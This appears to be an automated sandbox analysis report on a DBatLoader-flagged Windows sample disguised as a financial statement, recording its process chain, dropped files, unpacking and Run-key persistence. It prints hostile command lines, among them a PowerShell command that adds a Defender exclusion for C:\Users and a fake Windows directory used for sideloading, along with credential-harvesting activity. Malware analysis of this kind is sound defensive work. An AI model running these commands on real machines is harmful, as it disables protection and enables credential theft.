Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wkrriuhD.pif, 0000001B.00000002.1406746333.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: midyear_statement.exe	ReversingLabs: Detection: 26%
Source: midyear_statement.exe	Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\midyear_statement.exe

File read: C:\Users\user\Desktop\midyear_statement.exe

Jump to behavior

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\midyear_statement.exe "C:\Users\user\Desktop\midyear_statement.exe"
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"
Source: C:\Windows \System32\2506803.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
Source: unknown	Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"	Jump to behavior
Source: C:\Windows \System32\2506803.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif

Source: C:\Users\user\Desktop\midyear_statement.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: midyear_statement.exe

Static file information: File size 1265664 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
Source:	Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 27.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 28.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 29.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.midyear_statement.exe.2656dc8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.2a46bd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.40a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.2656dc8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.midyear_statement.exe.2a46bd8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Binary contains a suspicious time stamp

Source: wkrriuhD.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_040B7A50

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .....

PE file contains an invalid checksum

Source: midyear_statement.exe	Static PE information: real checksum: 0x0 should be: 0x139d32
Source: netutils.dll.0.dr	Static PE information: real checksum: 0x22e25 should be: 0x1cc51
Source: wkrriuhD.pif.0.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Dhuirrkw.PIF.23.dr	Static PE information: real checksum: 0x0 should be: 0x139d32

PE file contains sections with non-standard names

Source: 2506803.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BD48C push ecx; mov dword ptr [esp], edx	0_2_040BD491
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040AC4B0 push ecx; mov dword ptr [esp], edx	0_2_040AC4B5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040AD4E4 push 040AD510h; ret	0_2_040AD508
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A66FA push 040A673Eh; ret	0_2_040A6736
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A66FC push 040A673Eh; ret	0_2_040A6736
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB0AC push 040CB125h; ret	0_2_040CB11D
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB144 push 040CB1ECh; ret	0_2_040CB1E4
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB1F8 push 040CB288h; ret	0_2_040CB280
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CA2A4 push 040CA4A4h; ret	0_2_040CA49C
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A32C0 push eax; ret	0_2_040A32FC
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CB2F4 push 040CB35Fh; ret	0_2_040CB357
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A631E push 040A637Bh; ret	0_2_040A6373
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A6320 push 040A637Bh; ret	0_2_040A6373
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CC360 pushad ; ret	0_2_040CC365
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7C48 push 040B7C80h; ret	0_2_040B7C78
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7C46 push 040B7C80h; ret	0_2_040B7C78
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B5DC0 push ecx; mov dword ptr [esp], edx	0_2_040B5DC2
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B2EA4 push 040B2F1Ah; ret	0_2_040B2F12
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040CEF18 push eax; ret	0_2_040CEFE8
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B2FAF push 040B2FFDh; ret	0_2_040B2FF5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B2FB0 push 040B2FFDh; ret	0_2_040B2FF5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7850 push 040B78CDh; ret	0_2_040B78C5
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B688A push 040B6937h; ret	0_2_040B692F
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B688C push 040B6937h; ret	0_2_040B692F
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B9AF8 push 040B9B30h; ret	0_2_040B9B28
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040ACB2B push 040ACCB6h; ret	0_2_040ACCAE
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040ACB30 push 040ACCB6h; ret	0_2_040ACCAE
Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613D0021 pushfq ; iretd	16_2_613D002A
Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613D0D00 pushfq ; ret	16_2_613D0D01
Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613D1DFE push rsp; iretd	16_2_613D1DFF
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_00402DB4 push eax; ret	24_2_00402E84

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Dhuirrkw.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Users\Public\Libraries\wkrriuhD.pif			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows \System32\2506803.exe

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12336EB0 ShellExecuteW,URLDownloadToFileW,

24_2_12336EB0

Drops PE files

Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\2506803.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Dhuirrkw.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Users\Public\Libraries\wkrriuhD.pif	Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\netutils.dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\2506803.exe			Jump to dropped file
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\netutils.dll			Jump to dropped file

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_1234AA4A

Source: C:\Users\user\Desktop\midyear_statement.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhuirrkw			Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhuirrkw			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\midyear_statement.exe

0_2_040B9B34

Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
